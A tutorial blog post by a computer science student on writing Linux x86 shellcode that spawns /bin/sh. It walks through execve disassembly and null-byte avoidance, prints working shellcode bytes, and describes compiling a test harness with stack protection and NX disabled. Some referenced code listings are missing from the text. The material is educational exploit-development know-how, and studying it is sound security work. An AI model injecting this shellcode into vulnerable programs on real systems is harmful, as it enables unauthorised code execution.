In this article I’ll walk through the entire process of writing shellcode for linux. Writing your own shellcode is considered by some as some sort of black magic, so I thought I’d make it less murkier through this comprehensive write-up to write shellcode which would spawn a shell. I’ll be working on a 64bit Ubuntu 15.10 OS. However in order to better explain the process, I’ll be working with 32 bit binaries and x86 assembly. Bear in mind that the addresses(as seen in the disassembled code etc.) will most likely be different in your computers, however the procedure will remain the same as I have explained.
What is shellcode?
“Shellcode” to a beginner in the field of information security is just a bunch of ‘\x**’ characters tied together, which make no sense whatsoever. For instance
\xeb\x18\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x8d\x4e\x08\x89\x46\x0c\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68 is a seemingly unassuming piece of shellcode which when executed will spawn a shell with the permissions of the process which is running it. If a hacker is able to somehow have this small piece of code executed in a commonly used software he could easily become a millionare for having found his own zero day exploit. However, it’s not that easy. There are a lot of constraints which come into play (for instance, the length of shellcode) and thus it is essential that one should know how to write and customize their own shellcode.
Syscalls are ways by which user mode interacts with the kernel mode in order to execute operating system specific instructions such as IO, executing a program, exiting a process, reading/writing files etc. Each such syscall has a particular number associated with it. In order to make the syscall, first of all this particular syscall number is loaded into the eax register, then all other syscall parameters are loaded into other registers, and then finally the interrupt instruction
0x80 instruction is executed. Now the CPU is in kernel mode and executes the syscall function.
Let us start by writing a C program to spawn a shell. We’ll be executing /bin/sh using the execve(). Looking at the man pages of execve():
So we’ll need to pass the filename “/bin/sh” and argv which is an array of argument strings with the first string as “/bin/sh”(the filename we want to execute). There are no other arguments we require so we’ll terminate this array by NULL. We’ll not be passing any envp strings.
Here is the program:
Let’s see if it works. We compile and run the program. And yes, we get a shell.
Thus our code works.
Understanding execve() disassembly
Now let’s take a look at a disassembly of the execve function. To do that we’ll compile our program with the -static option of gcc (ie.
gcc shell.c -o shell -m32 -static) in order to prevent dynamic linking and thus allowing us to examine the instructions of execve() using
objdump -d shell. I have removed the portion of disassembled code which is not important to us right now.
Let’s try to understand what some of these instructions do.
This copies the address of “/bin/sh” to memory:
8048bd8: c7 45 ec c8 bf 0b 08 movl $0x80bbfc8,-0x14(%ebp)
This copies the NULL value to the adjacent memory location:
8048bdf: c7 45 f0 00 00 00 00 movl $0x0,-0x10(%ebp)
Now the address of “/bin/sh” is copied to the eax register from the memory:
8048be6: 8b 45 ec mov -0x14(%ebp),%eax
Now the parameters are pushed to the stack in reverse order, starting from NULL.:
Next, the argv parameter, which is again the address of the getshell array, is first copied to the edx register, then pushed onto the stack:
Finally the address of filename(“/bin/sh”) which had been stored in the eax register is pushed onto the stack and execve() is called.
Now all execve() has to do is set up the registers and make the syscall. Let’s see how it does that. First it loads the address of NULL to edx, then it loads the address of our getshell array to ecx, then loads the address of “/bin/sh” into ebx.
Finally, it places the syscall number of execve(which is 11 or 0xb) into eax, and makes the system interrupt.
Writing your own shellcode
Now that we understand how the call to execve() is done, let’s start writing our own shellcode. We’ll be writing it in Intel syntax. We’ll have to take care of two things though:
Our shellcode must not contain hardcoded addresses since we don’t want to write shellcode which might not work in other linux systems or other vulnerable programs.
Our shellcode must not contain \x00 bytes as these are used to terminate a string. Most likely, our shellcode will be placed in some sort of string buffer, and a \x00 byte will not allow the instruction after it to be executed.
Now let’s design how the pseudo assembly code must look so that we don’t have hardcoded addresses. We’ll have to somehow store the base address of the shellcode and use relative addressing thereafter. A common trick to accomplish this is to start our shellcode with a jump instruction and placing the actual shellcode just after it. When the jmp instruction is executed it will automatically push the address following it onto the stack. Here’s how the pseudocode will look like
First of all the callShellcode will be called. From callShellcode the call to shellcode will be made. This call will store the address of the string “/bin/shNAAAABBBB” on to the stack. We have used the string “/bin/shNAAAABBBB” insead of “/bin/sh” because we also need to have some memory locations from where we can load the parameters of the execve call to the registers.
Now let’s start writing the contents of the shellcode. First of all we’ll store the address of the first byte of string “/bin/shNAAAABBBB” into esi.
Next we’ll clear out eax by XORing it with itself.
xor eax, eax
Next we’ll NULL terminate the “/bin/sh” string. We also do this so that we can use the same address for our argv array whose contents are “/bin/sh” followed by NULL. The eax register has been filled with NULLs from our previous instruction. The al register is a 8bit register within the eax register which too is therefore NULL. We’ll copy the value of the al register over the ‘N’ character in the string “/bin/shNAAAABBBB”. The offset of ‘N’ from the start of the string is 7. Therefore, our instruction will be:
mov [esi + 7], al
Next we’ll be loading the address of our string “/bin/sh” into the ebx register. We can do it in 2 ways, using:
mov ebx, esi
lea ebx, [esi]
Since both these instructions amount to 2 bytes (
\x8d\x1e respectively), it won’t make any difference to the length of the shellcode.
Next we’ll be loading the address of the argv array into the ecx. Bear in mind, it’s an address of an array, so it will be something like a pointer to pointer. We’ll first need to copy the address of the array(“/bin/sh” followed by NULL) to a memory location. Next, we’ll load the address of this memory location into the ecx register. The memory location we’ll be using is the location of ‘AAAA’ in our string “/bin/shNAAAABBBB”
Next we’ll be loading the address of four NULL bytes into the edx register. We’ll first copy 4 NULL bytes from the eax register to the memory location of ‘BBBB’ in our initial string ‘/bin/sh/NAAAABBBB’. Then, we’ll load the address of this memory location into the edx register.
Finally, we’ll load the syscall number(11 or 0xb) to the eax register. However if we use eax in our instruction, the resulting shellcode will contain some NULL(\x00) bytes and we don’t want that. Our eax register already is NULL. So we’ll just load the syscall number to the al register instead of the entire eax register. Finally, we’ll make the system interrupt.
The entire assembly code would now look like:
Now let’s compile this assembly code using nasm to an elf binary. The last step in compiling the assembly code is using the ld command which combines a number of object and archive files, relocates their data and ties up symbol references.(from man pages). Thus we finally have our executable ready.
Let’s take a look at its disassembly.
In order to get the shellcode from this disassembly, we can use a small bash script:
We get the shellcode output as
\xeb\x18\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x8d\x4e\x08\x89\x46\x0c\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42. Our shellcode does not contain any \x00 bytes or any hardcoded addresses.
Let’s try running this shellcode through a C program.
We’ll compile the C file with the following options:
-m32: because our shellcode is for 32 bit systems only.
-fno-stack-protector: This disables the canary stack protection.
-z execstack: This makes the stack executable by disabling the NX protection.
And Voila! We spawned a shell. Our shellcode is now ready to be put into action in some vulnerable programs. We can actually omit the ‘NAAAABBBB’ part sometimes in order to shorten our shellcode. The shortened shellcode then becomes
The entire process of writing shellcode is a long and tedious one, requiring a lot of patience. However, learning to write shellcode helps in understanding a lot of concepts, and hopefully I was able to help the readers with that. If you have any questions, ask in the comments down below. Also, please correct me if I have been wrong anywhere.
About the author
I am Paras Chetal, an undergraduate student at IIT Roorkee currently pursuing Bachelors of Technology in Computer Science and Engineering who is passionate about information security, networking and software development. I also regularly participate in CTFs, practice wargames and develop tools and software related to the field of cyber security, all ethically ofcourse.